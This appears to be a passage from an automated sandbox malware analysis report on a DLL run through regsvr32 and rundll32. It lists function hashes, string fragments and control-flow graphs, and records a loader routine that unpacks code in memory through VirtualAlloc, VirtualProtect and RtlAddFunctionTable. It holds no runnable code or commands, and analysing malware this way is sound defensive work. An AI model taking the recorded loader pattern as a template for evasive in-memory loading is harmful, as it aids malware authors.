                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$ExceptionFilterProcessUnhandled_errno$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentSleepTerminate
                                                                    • String ID:
                                                                    • API String ID: 2294642566-0
                                                                    • Opcode ID: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                    • Instruction ID: afbbcaf143b8e1911a49c236c0b23111ba87fdeef6fd51d531f8acd7ed786b15
                                                                    • Opcode Fuzzy Hash: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                    • Instruction Fuzzy Hash: F451B132E04A8586EB219F29EC6016E63F5FB84B98F485035DE4D87BA4DE3CDA46C344
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _getptd
                                                                    • String ID:
                                                                    • API String ID: 3186804695-0
                                                                    • Opcode ID: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                    • Instruction ID: 64f6bbf3ccdee6205e0379350f0c55e5408171d35490ca32eb8ea946f432b035
                                                                    • Opcode Fuzzy Hash: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                    • Instruction Fuzzy Hash: CD819B72A0968696DB24DB25E9946AEB3F0FB48784F505135DF8D83BA4EF38E101CB04
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _lock$DecodePointer_errno_getptd
                                                                    • String ID:
                                                                    • API String ID: 4201827665-0
                                                                    • Opcode ID: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                    • Instruction ID: d15dbb2967dd54c7eb34a61c7c1751eb5a55e6efb1b76d3a16a61abfbe29e32d
                                                                    • Opcode Fuzzy Hash: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                    • Instruction Fuzzy Hash: 67512B21E0A6428AFB649B26EC61BBE22F1FF44784F106035DD4D87BA1DE7DE9408748
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$DecodePointercalloc
                                                                    • String ID:
                                                                    • API String ID: 1531210114-0
                                                                    • Opcode ID: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                    • Instruction ID: f4c14d76761715905c9e27f152d2285fb2f87322bfe92a8b42dad1a36735b202
                                                                    • Opcode Fuzzy Hash: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                    • Instruction Fuzzy Hash: 72216262E0964245FB289A65982537E62F0BF547C0F449138DF4D87F96DF3CE9108648
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _lock.LIBCMT ref: 00007FFF21BB53B2
                                                                    • free.LIBCMT ref: 00007FFF21BB53D7
                                                                      • Part of subcall function 00007FFF21BB3024: HeapFree.KERNEL32(?,?,00000000,00007FFF21BB2DDC,?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB303A
                                                                      • Part of subcall function 00007FFF21BB3024: _errno.LIBCMT ref: 00007FFF21BB3044
                                                                      • Part of subcall function 00007FFF21BB3024: GetLastError.KERNEL32(?,?,00000000,00007FFF21BB2DDC,?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB304C
                                                                    • _lock.LIBCMT ref: 00007FFF21BB53F2
                                                                    • free.LIBCMT ref: 00007FFF21BB5438
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _lockfree$ErrorFreeHeapLast_errno
                                                                    • String ID:
                                                                    • API String ID: 3188102813-0
                                                                    • Opcode ID: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                    • Instruction ID: e8593829526bd53c069391ce21bccb0a32a471cdf1cfb467de63eb51792c3360
                                                                    • Opcode Fuzzy Hash: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                    • Instruction Fuzzy Hash: DE111821E0B50285FF75AA71DC7177C22F0BF84704F446135DA1EC6AE5DE6CAA41826A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalDeleteSection$Freefree
                                                                    • String ID:
                                                                    • API String ID: 1250194111-0
                                                                    • Opcode ID: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                    • Instruction ID: b556d29f8aff9cda908ba7a6f66ca8aa5f05bb7ba79fe192626aedb1f75f20f3
                                                                    • Opcode Fuzzy Hash: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                    • Instruction Fuzzy Hash: E6116331E099428AFB248B26EC6423C73F0FB44B50F586531DA6D82AB5CF3CE9918748
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _lock$Sleep_errno_getptd
                                                                    • String ID:
                                                                    • API String ID: 2111406555-0
                                                                    • Opcode ID: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                    • Instruction ID: a29cc2baa000817c8d68149fdc4decf6f2e88f8fac90863401ebe55802ba13db
                                                                    • Opcode Fuzzy Hash: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                    • Instruction Fuzzy Hash: E1019221E0924286FB646B71DC627AD62B0FF44784F40A034DE0DC77E6CE2CAD50835A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$_getptd
                                                                    • String ID: #
                                                                    • API String ID: 3432092939-1885708031
                                                                    • Opcode ID: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                    • Instruction ID: 6b25ef8338f5646920431b9ddbafcdbd9d017fbf6f7f51223973ca0bdf1a8fd9
                                                                    • Opcode Fuzzy Hash: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                    • Instruction Fuzzy Hash: E0519F22E0CA8585E7308B25E9602BEABF0F781B80F585131DE8D93B65CE3DD941CB06
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                    • Instruction ID: 1664a91b561dcdbcda72d8fbdae55c45588bda4322fabfcbd2dd2ff52c9d8e47
                                                                    • Opcode Fuzzy Hash: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                    • Instruction Fuzzy Hash: C8519372E096868AEB709F16E8602BD67F0BB49B80F546531DF5D87BA1CE3CE641C304
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:11.1%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:11
                                                                    Total number of Limit Nodes:0
                                                                    execution_graph 3416 2165c710000 3417 2165c710183 3416->3417 3418 2165c71043e VirtualAlloc 3417->3418 3422 2165c710462 3418->3422 3419 2165c710a7b 3420 2165c710531 GetNativeSystemInfo 3420->3419 3421 2165c71056d VirtualAlloc 3420->3421 3426 2165c71058b 3421->3426 3422->3419 3422->3420 3423 2165c710a00 3423->3419 3424 2165c710a56 RtlAddFunctionTable 3423->3424 3424->3419 3425 2165c7109d9 VirtualProtect 3425->3426 3426->3423 3426->3425 3426->3426

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 2165c710000-2165c710460 call 2165c710aa8 * 2 VirtualAlloc 22 2165c71048a-2165c710494 0->22 23 2165c710462-2165c710466 0->23 26 2165c71049a-2165c71049e 22->26 27 2165c710a91-2165c710aa6 22->27 24 2165c710468-2165c710488 23->24 24->22 24->24 26->27 28 2165c7104a4-2165c7104a8 26->28 28->27 29 2165c7104ae-2165c7104b2 28->29 29->27 30 2165c7104b8-2165c7104bf 29->30 30->27 31 2165c7104c5-2165c7104d2 30->31 31->27 32 2165c7104d8-2165c7104e1 31->32 32->27 33 2165c7104e7-2165c7104f4 32->33 33->27 34 2165c7104fa-2165c710507 33->34 35 2165c710509-2165c710511 34->35 36 2165c710531-2165c710567 GetNativeSystemInfo 34->36 38 2165c710513-2165c710518 35->38 36->27 37 2165c71056d-2165c710589 VirtualAlloc 36->37 39 2165c71058b-2165c71059e 37->39 40 2165c7105a0-2165c7105ac 37->40 41 2165c71051a-2165c71051f 38->41 42 2165c710521 38->42 39->40 44 2165c7105af-2165c7105b2 40->44 43 2165c710523-2165c71052f 41->43 42->43 43->36 43->38 46 2165c7105c1-2165c7105db 44->46 47 2165c7105b4-2165c7105bf 44->47 48 2165c71061b-2165c710622 46->48 49 2165c7105dd-2165c7105e2 46->49 47->44 50 2165c710628-2165c71062f 48->50 51 2165c7106db-2165c7106e2 48->51 52 2165c7105e4-2165c7105ea 49->52 50->51 53 2165c710635-2165c710642 50->53 54 2165c7106e8-2165c7106f9 51->54 55 2165c710864-2165c71086b 51->55 56 2165c71060b-2165c710619 52->56 57 2165c7105ec-2165c710609 52->57 53->51 60 2165c710648-2165c71064f 53->60 61 2165c710702-2165c710705 54->61 58 2165c710917-2165c710929 55->58 59 2165c710871-2165c71087f 55->59 56->48 56->52 57->56 57->57 62 2165c710a07-2165c710a1a 58->62 63 2165c71092f-2165c710937 58->63 64 2165c71090e-2165c710911 59->64 65 2165c710654-2165c710658 60->65 66 2165c710707-2165c71070a 61->66 67 2165c7106fb-2165c7106ff 61->67 88 2165c710a1c-2165c710a27 62->88 89 2165c710a40-2165c710a4a 62->89 68 2165c71093b-2165c71093f 63->68 64->58 72 2165c710884-2165c7108a9 64->72 69 2165c7106c0-2165c7106ca 65->69 70 2165c710788-2165c71078e 66->70 71 2165c71070c-2165c71071d 66->71 67->61 73 2165c7109ec-2165c7109fa 68->73 74 2165c710945-2165c71095a 68->74 78 2165c71065a-2165c710669 69->78 79 2165c7106cc-2165c7106d2 69->79 76 2165c710794-2165c7107a2 70->76 75 2165c71071f-2165c710720 71->75 71->76 94 2165c710907-2165c71090c 72->94 95 2165c7108ab-2165c7108b1 72->95 73->68 84 2165c710a00-2165c710a01 73->84 81 2165c71097b-2165c71097d 74->81 82 2165c71095c-2165c71095e 74->82 87 2165c710722-2165c710784 75->87 90 2165c7107a8 76->90 91 2165c71085d-2165c71085e 76->91 85 2165c71066b-2165c710678 78->85 86 2165c71067a-2165c71067e 78->86 79->65 80 2165c7106d4-2165c7106d5 79->80 80->51 97 2165c71097f-2165c710981 81->97 98 2165c7109a2-2165c7109a4 81->98 92 2165c71096e-2165c710979 82->92 93 2165c710960-2165c71096c 82->93 84->62 96 2165c7106bd-2165c7106be 85->96 99 2165c71068c-2165c710690 86->99 100 2165c710680-2165c71068a 86->100 87->87 101 2165c710786 87->101 102 2165c710a38-2165c710a3e 88->102 104 2165c710a7b-2165c710a8e 89->104 105 2165c710a4c-2165c710a54 89->105 103 2165c7107ae-2165c7107d4 90->103 91->55 110 2165c7109be-2165c7109bf 92->110 93->110 94->64 106 2165c7108bb-2165c7108c8 95->106 107 2165c7108b3-2165c7108b9 95->107 96->69 111 2165c710989-2165c71098b 97->111 112 2165c710983-2165c710987 97->112 116 2165c7109a6-2165c7109aa 98->116 117 2165c7109ac-2165c7109bb 98->117 114 2165c710692-2165c7106a3 99->114 115 2165c7106a5-2165c7106a9 99->115 113 2165c7106b6-2165c7106ba 100->113 101->76 102->89 108 2165c710a29-2165c710a35 102->108 129 2165c7107d6-2165c7107d9 103->129 130 2165c710835-2165c710839 103->130 104->27 105->104 109 2165c710a56-2165c710a79 RtlAddFunctionTable 105->109 120 2165c7108ca-2165c7108d1 106->120 121 2165c7108d3-2165c7108e5 106->121 119 2165c7108ea-2165c7108fe 107->119 108->102 109->104 118 2165c7109c5-2165c7109cb 110->118 111->98 124 2165c71098d-2165c71098f 111->124 112->110 113->96 114->113 115->96 125 2165c7106ab-2165c7106b3 115->125 116->110 117->110 126 2165c7109d9-2165c7109e9 VirtualProtect 118->126 127 2165c7109cd-2165c7109d3 118->127 119->94 138 2165c710900-2165c710905 119->138 120->120 120->121 121->119 131 2165c710999-2165c7109a0 124->131 132 2165c710991-2165c710997 124->132 125->113 126->73 127->126 134 2165c7107db-2165c7107e1 129->134 135 2165c7107e3-2165c7107f0 129->135 136 2165c71083b 130->136 137 2165c710844-2165c710850 130->137 131->118 132->110 139 2165c710812-2165c71082c 134->139 140 2165c7107fb-2165c71080d 135->140 141 2165c7107f2-2165c7107f9 135->141 136->137 137->103 142 2165c710856-2165c710857 137->142 138->95 139->130 144 2165c71082e-2165c710833 139->144 140->139 141->140 141->141 142->91 144->129
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395575537.000002165C710000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002165C710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_2165c710000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                    • API String ID: 394283112-2517549848
                                                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction ID: 36287d5f2f6e27699df48300912d74b03639d4201edccb98f99f2cfef45d867f
                                                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction Fuzzy Hash: 0772F430618A4C8BDB69DF18C8997FDBBE6FBA4304F50462DE88AC3651DB34D542CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                    • API String ID: 0-464535774
                                                                    • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                    • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                    • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                    • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 180 180010ff4-180011016 181 180011020 180->181 182 180011022-180011028 181->182 183 180011814 182->183 184 18001102e-180011034 182->184 185 180011819-18001181f 183->185 186 1800114e2-1800114ec 184->186 187 18001103a-180011040 184->187 185->182 188 180011825-180011832 185->188 191 1800114f5-18001151d 186->191 192 1800114ee-1800114f3 186->192 189 1800113e2-1800114d2 call 180008200 187->189 190 180011046-18001104c 187->190 189->188 199 1800114d8-1800114dd 189->199 190->185 194 180011052-18001120b call 180021040 call 1800291ac 190->194 195 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 191->195 192->195 207 180011212-1800113d7 call 1800291ac call 18001e2bc 194->207 208 18001120d 194->208 209 1800117f9-180011803 195->209 199->182 207->188 215 1800113dd 207->215 208->207 209->188 212 180011805-18001180f 209->212 212->182 215->181
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                    • API String ID: 0-3528011396
                                                                    • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                    • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 222 18002166b-180021670 219->222 223 180021838-180021845 220->223 224 180021c35 220->224 228 180021bdf-180021bee 221->228 225 1800219f3-180021a7c call 180001b1c 222->225 226 180021676-18002167b 222->226 224->217 225->217 229 1800219e4-1800219ee 226->229 230 180021681-180021686 226->230 228->217 229->217 232 1800219d5-1800219df call 18001dfb4 230->232 233 18002168c-180021691 230->233 232->217 235 180021697-18002169c 233->235 236 18002190c-1800219a5 call 18000abac 233->236 239 1800216a2-1800216a7 235->239 240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 246 1800219b2-1800219c6 243->246 247 1800219cb-1800219d0 243->247 244->223 246->217 247->217
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $&.+$)O$.pN$F>9$t(/
                                                                    • API String ID: 0-3036092626
                                                                    • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                    • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                    • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                    • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 252 180028c20-180028c53 253 180028c58-180028c5e 252->253 254 180028c64-180028c6a 253->254 255 1800290ae-180029147 call 180013e28 253->255 256 1800290a4-1800290a9 254->256 257 180028c70-180028c76 254->257 262 18002914c-180029152 255->262 256->253 259 180029003-18002909f call 180008ea0 257->259 260 180028c7c-180028c82 257->260 259->253 264 180028c88-180028c8e 260->264 265 180028fab-180028ffe call 1800223c4 260->265 268 180029154 262->268 269 18002919c-1800291a8 262->269 266 180028c94-180028c9a 264->266 267 180028df6-180028e1e 264->267 265->253 272 180028d62-180028ddb call 180016bd8 266->272 273 180028ca0-180028ca6 266->273 267->253 275 180028e24-180028e3c 267->275 268->253 285 180028de0-180028de6 272->285 276 180028cac-180028cb2 273->276 277 180029159-180029197 call 1800164c8 273->277 279 180028e42-180028ee6 call 18001d49c 275->279 280 180028ee9-180028f0b 275->280 276->262 283 180028cb8-180028d5d call 180010c00 276->283 277->269 279->280 281 180028f94-180028f95 280->281 282 180028f11-180028f92 call 18001d49c 280->282 288 180028f98-180028f9b 281->288 282->288 283->253 285->269 290 180028dec-180028df1 285->290 288->253 293 180028fa1-180028fa6 288->293 290->253 293->253
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.395299440.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: :G$Q27$_5$yy8x$Mh
                                                                    • API String ID: 0-3587547327
                                                                    • Opcode ID: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                    • Instruction ID: f758bc8895b8ed7f582f71be29fb7142b0f1d07f9cbefdc8313849e51cf7b1d3
                                                                    • Opcode Fuzzy Hash: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                    • Instruction Fuzzy Hash: 3DF1E07051434CEBDFA9DF68C8CAA9D3BA0FF48394FA06219FD0696250D775D988CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
